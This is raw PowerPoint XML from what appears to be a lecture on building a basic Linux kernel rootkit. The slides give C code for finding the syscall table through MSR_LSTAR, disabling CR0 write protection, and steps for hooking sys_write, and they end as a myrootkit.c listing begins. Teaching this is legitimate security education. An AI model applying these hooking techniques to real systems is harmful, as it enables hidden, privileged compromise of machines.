            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>[512];	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>rdmsrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>(MSR_LSTAR, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>sct_off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t> *)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>sct_off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>));	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>	    p = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t> **)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0" err="1"/>
              <a:t>memmem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>), "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>\x14\xc5", 3);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    if ( p )	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    {	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	        unsigned long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = *(unsigned long **)((char *)p + 3);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = (unsigned long *)(((unsigned long)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> &amp; 0xffffffff) | 0xffffffff00000000);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0"/>
              <a:t>	        return sct;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0"/>
              <a:t>	    }	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1200" dirty="0" err="1"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0"/>
              <a:t>	        return NULL;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0"/>
              <a:t>	}	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1049561859"/>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Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hooking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For simplicity, we are statically defining our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> table location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that x86_64 has two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tables, we will only be dealing with the first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, the system call table is in protected memory…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1941727088"/>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Bypassing kernel write protections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Refer back to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that there is an R, meaning the page of memory where the  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> array is write-protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even at ring/privilege level 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How can we bypass the kernel’s/processor’s write protect mode?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583878" y="2190871"/>
            <a:ext cx="7721600" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78756298"/>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cr0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1600200"/>
            <a:ext cx="8327985" cy="5043668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cr0 is a control register (32 bit on x86, 64 on x86-64)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CPU will prevent writing to protected memory pages if bit 16 is on (WP mode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We need to flip this bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux conveniently has a read_cr0 and write_cr0 function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To disable WP; bitwise and, not 0x10000: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>write_cr0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(read_cr0 () &amp; (~ 0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To enable WP; bitwise or 0x10000:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>write_cr0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(read_cr0 () | 0x10000);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813920038"/>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Hooking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1600200"/>
            <a:ext cx="8327985" cy="5043668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That’s all we need to know to write a basic kernel rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will not function as a rootkit by definition, but lays the foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will only hook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for simplicity’s sake, but to actually function as a ‘root’ kit, would need to hook: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_setreuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2066558994"/>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Hooking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4846899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>System.map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-X.X.X for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> statically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flip cr0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copy new *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> into SCT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flip cr0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also cleanup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> char __user *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891252715"/>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8901"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myrootkit.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144684" y="1024099"/>
            <a:ext cx="8854632" cy="5755422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
